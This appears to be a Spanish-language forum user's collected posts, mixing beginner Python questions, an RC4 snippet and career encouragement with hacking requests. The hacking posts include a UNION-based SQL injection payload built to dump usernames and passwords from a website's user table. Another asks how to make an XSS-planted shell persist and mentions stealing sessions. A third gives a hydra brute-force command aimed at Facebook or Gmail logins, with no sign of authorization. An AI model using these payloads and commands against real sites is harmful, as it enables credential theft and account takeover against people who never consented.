Mensajes

como testear una vulnerabilidad en ASP.net y como aprovecharla

BUENO ESTABA TESTEANDO UNA PAGINA WEB Y ME QUEDE AQUI

-30633+UNION+SELECT+1,2,3,4,5,6,group_concat(login,0x3a,password.),8,9,10,11,12,13+from+usuario--

QUIERO QUE ME DE EL USUARIO Y LA CONTRAEÑA PERO NO ME LA DA

QUE ES LO QUE TENGO MAL

esque me encontré una vulne en xss pero quería saber que se puede hacer con ella escuche de un maestro que se pueden robar sesiones

pero ejecute una shell en html y se ejecute pero no se guarda

como se podría guardar esa shell sin que se borre ???

esque me estoy metiendo con python y estoy el el if elif else

y no me ejecuta ya que dice error de syntaxis y me marcaca error en else

mi ejercicio ere este

Código (python) [Seleccionar] Expandir

var1 = raw_input("tu edad")

if var1 >= 18:
print "eres mayor de edad"

elif var < 18:
print " no eres mayor de edad"

else:
print "no es un numero"


y luego me marca error en el elif y else

es python 2.7

Comienza quizás con un RC4 es fácil. o con un xor.

Código (python) [Seleccionar] Expandir


def rc4crypt(data, key):
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
   
    return ''.join(out)


analiza el codigo y aprende.
bueno ahora al hospital a curarme los ojos  haha saludos

gracias y suerte con tus ojos

lo que quiero hacer es como cuando ingresas un valor en las paginas donde te dan el binario tienes que ingresar tu texto por ejemplo "hola mundo" y te dan el binario es lo que yo quiero hacer pero con python

alguien que me pudiera ayudar con eso se lo agraceria mucho gracias

no te dejes llevar por lo que lees también acá en México dicen que ingeniería en informática y sistemas no tienen futuro pero eso no importa solo esta en lo que tienes tuuuuuuuu com persona yo estoy estudiando ingeniería en sistemas computacionales (programador) y el la uni me enseñan cosas bastante buenas pero para mi jamas me basta pertenezco a un grupo de desarrollo de software somos bastantes y yo soy el mas chico de todos tengo 18 y se lo que ellos saben voy muy adelantado ya que e echo navegadores, paginas web, y me encargo de la seguridad pero eso no me lo enseño la escuela sino por mi mismo y ellos son de informática, no necesitas de una mugroso país para salir adelante, solamente aprende todo lo que puedas y refuerza lo que ya sabes y entre mas saves mas vales (es lo que dice mama jajaja xD) y no te desilusiones y échale todas las ganas que puedas el detino lo forjas tu no un articulo ánimos

la imaginación vale mas que el conocimiento

bueno lo me sale en el hydra es cuando se epieza a logear en el face o gmail ya que se tiene que tomar el id de los campos y colocarlos en en hydra este es el codigo que utilizo

Código (actionscript-french) [Seleccionar] Expandir

hydra -l USUARIO -p contraseña www.pagina.com http-post-form "/login.php?login_attempt=1:email=^USER^&pass=^PASS^:incorrect"

ya que pass es el id del campo de la contra y el user es el id de el campo de usuario

BUENO EN MI CASO YO USO 2 QUE ES BACK TRACK Y EL OTROS ES WIFIWAY PERO CREO QUE YA TIENE OTRO NOMBRE WIFISLAX CREO Y SUERTE

buen post